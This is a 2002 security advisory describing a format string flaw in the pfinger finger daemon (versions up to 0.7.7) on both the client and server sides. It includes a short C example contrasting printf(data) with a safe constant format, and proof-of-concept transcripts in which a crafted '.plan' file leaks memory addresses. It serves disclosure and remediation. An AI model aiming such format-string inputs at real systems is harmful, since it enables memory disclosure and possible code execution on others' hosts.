pfinger format string vulnerability
26th Sep 2002 [SBWID-4952]
COMMAND

	pfinger format string vulnerability

SYSTEMS AFFECTED

	pfinger <= 0.7.7

PROBLEM

	A format string vulnerability in pfinger, a finger daemon, has been
	discovered and published in INTEXXIA SECURITY ADVISORY ID #1050-181201,
	by Guillaume Pelat.
	
	Both the client and the server are vulnerable to a format string injection,
	for example through a '.plan' file.
	
	Client side: the client passes the data received from the server directly
	as the first (format) argument of printf(3). A user could create a
	specially crafted '.plan' file that the pfinger client would print.
	As a result, it could be possible to execute arbitrary code on the
	client side.
	
	Server side: if the server is configured to connect to a master server
	(with the <sitehost> directive), the data received from the master server
	is used directly as the first argument of printf(3). If a malicious user
	modifies the master to make it send crafted data, code can be executed
	on the vulnerable 'slave' server.
	
	If a user has an account on the master server, he can create a crafted
	'.plan' file containing the format string. A simple request to the
	'client' server would then also exploit the server-side vulnerability.
	
	The pfinger daemon runs with 'nobody' permissions by default. Complete
	exploitation of this vulnerability permits an attacker to execute code
	with 'nobody' permissions, but this flaw could be used to compromise
	the local system by exploiting other local vulnerabilities.
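	As an added illustration (this is not pfinger's source and not part of the advisory), the C below contrasts the pattern described above for both the client and the server side, untrusted text passed as the format argument of printf(3), with the fix of passing it as data under a constant format. The sample '.plan' line is the constructed one from the proof of concept, and the function names are hypothetical.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample: the kind of .plan content the advisory demonstrates.
   Whether it arrives from a local .plan (client side) or from a master
   server's reply (server side), it is untrusted input. */
static const char SAMPLE_PLAN[] = "Now a little format string: %p %p %p :-)";

/* Counts printf-style conversion directives in untrusted text.
   "%%" is a literal percent sign and is not counted. A non-zero result
   in data that is about to be printed is worth logging: it is exactly
   the input that turns printf(data) into an exploitable call. */
int count_format_directives(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {      /* escaped percent: skip both characters */
            s++;
            continue;
        }
        n++;
    }
    return n;
}

/* The pattern the advisory describes: the received text *is* the format
   string, so every '%' in it is interpreted by printf(3).
   (Shown only for contrast; never call printf with a non-literal format.)

       printf(plan);               // vulnerable: plan is the format string

   The fix is to make the untrusted text an argument of a constant format.
   Returns the number of characters written, or -1 on error/truncation. */
int render_plan(const char *plan, char *out, size_t outlen)
{
    /* plan is data, not a format: a '%p' in it is copied through verbatim */
    int r = snprintf(out, outlen, "Plan:\n%s\n", plan);
    if (r < 0 || (size_t)r >= outlen)
        return -1;              /* encoding error or output did not fit */
    return r;
}

int main(void)
{
    char buf[256];

    printf("directives found: %d\n", count_format_directives(SAMPLE_PLAN));
    if (render_plan(SAMPLE_PLAN, buf, sizeof buf) < 0)
        return 1;
    fputs(buf, stdout);         /* fputs takes no format: safe for any text */
    return 0;
}
```

	Run stand-alone, the program reports three directives in the sample line and prints it back with the '%p' tokens intact, because they never reach a format parser. The same two rules apply to both code paths the advisory names: the client's handling of the server reply and the slave server's handling of the master's reply.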
	
	
	PROOF OF CONCEPT
	================
	
	Here are two proofs of concept, one for each side.
	
	Client side:
	
	
	evil@test:~$ cat ~/.plan 
	Now a little format string: %p %p %p :-)
	evil@test:~$ 
	
	good@test:~$ finger -l evil
	Login Name: evil                In real life: Evil
	Login    Name                   Status  Login time Host
	evil     Evil                   active  Mon 08:02  test
	No mail.
	Plan:
	Now a little format string: 0x8049da0 0x640 0x400a252d :-)
	good@test:~$
	
	
	Server side:
	
	
	good@test:~$ cat /etc/fingerconf
	<fingerconf>
	<sitehost>master</sitehost>
	</fingerconf>
	
	evil@master:~$ cat ~/.plan
	Now a little format string: %p %p %p :-)
	evil@master:~$ telnet test 79
	Trying x.x.x.x...
	Connected to test.lab.intexxia.com.
	Escape character is '^]'.
	/W evil
	Login Name: evil                        In real life: Evil
	Login    Name                   Status  Login time Host
	evil     Evil                   active  Mon 08:02  master
	No mail.
	Plan:
	Now a little format string: 0xbfbff860 0x400 0x0 :-)
	Connection closed by foreign host.
	evil@master:~$
	
	

SOLUTION

	A new version has been released which corrects this security issue.
	pfinger version 0.7.8 is available at:
	
	http://www.xelia.ch/unix/pfinger/
	
	
	Update (02 January 2003)
	========================
	
	Another format string vulnerability was found and corrected in version 0.7.9.